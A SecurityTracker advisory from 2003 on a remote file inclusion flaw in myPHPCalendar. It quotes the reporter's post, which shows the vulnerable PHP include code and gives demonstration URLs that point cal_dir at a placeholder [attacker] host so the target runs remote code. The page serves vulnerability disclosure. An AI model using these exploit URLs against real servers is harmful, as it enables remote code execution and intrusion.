SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Calendar)  >  myPHPCalendar Vendors:  myphpcalendar.sourceforge.net
myPHPCalendar Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1007919
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 12 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 10192000 Build 1 Beta
Description:  An include file vulnerability was reported in myPHPCalendar. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.

Frog-m@n reported that the 'admin.php', 'contacts.php', and 'convert-date.php' files include some files relative to the $cal_dir directory. A remote user can specify a remote location for the $cal_dir directory to cause files at the remote location to be included and executed by the target server.

Some demonstration exploit URLs are provided:

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php? cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/

The above URLs will include the either of the following files:

http://[attacker]/vars.inc
http://[attacker]/prefs.inc
Impact:  A remote user can cause arbitrary PHP code, including operating system commands, to be executed by the target system. The commands will run with the privileges of the web server.
Solution:  No vendor solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/
Vendor URL:  myphpcalendar.sourceforge.net/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Sun, 12 Oct 2003 13:18:44 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] myPHPCalendar : Informations Disclosure, File Include

 

Informations :
°°°°°°°°°°°°°
Language : PHP
Version : 10192000 Build 1 Beta
Website : http://myphpcalendar.sourceforge.net/
Problems :
- Informations Disclosure
- File Include


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

admin.php, contacts.php, convert-date.php :

------------------------
include ("globals.inc");
------------------------

globals.inc :

------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------


index.php :

----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------


setup.php :

----------------------------------------------------------------
$fp = fopen("setup.inc", "w+");
fputs($fp, "<?php\n");
fputs($fp, "\$url = \"".$URL."\";\n");
fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
----------------------------------------------------------------


Exploits :
°°°°°°°°

http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/

will include the files :

http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

and http://[target]/index.php?cal_dir=http://[attacker]/ will include the 
files :
http://[target]/globals.inc http://[target]/sql.inc



Patch :
°°°°°°°
A patch and more details can be found on http://www.phpsecure.info.




frog-m@n

_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/messengerparsms


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC